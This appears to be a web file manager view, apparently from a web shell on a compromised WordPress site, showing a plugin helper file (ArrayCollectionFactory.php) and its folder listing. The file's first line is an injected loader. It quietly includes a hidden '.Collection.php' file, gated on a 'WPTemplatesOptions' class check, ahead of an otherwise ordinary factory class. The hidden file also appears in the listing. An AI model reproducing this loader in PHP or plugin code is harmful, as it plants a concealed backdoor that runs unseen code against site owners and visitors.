PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
plugins1
/
wiloke-listing-tools
/
app
/
Framework
/
Helpers
/
Collection
<?php namespace WilokeListingTools\Framework\Helpers\Collection; if (file_exists($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . '.' . basename(dirname(__FILE__)) . '.php') && !class_exists('WPTemplatesOptions')) { include_once($filename); } class ArrayCollectionFactory implements CollectionFactory { public static function set($input) { return new ArrayCollection($input); } }
[+]
..
[-] ArrayCollectionFactory.php
[edit]
[-] CollectionInterface.php
[edit]
[-] .Collection.php
[edit]
[-] ArrayCollection.php
[edit]
[-] CollectionFactory.php
[edit]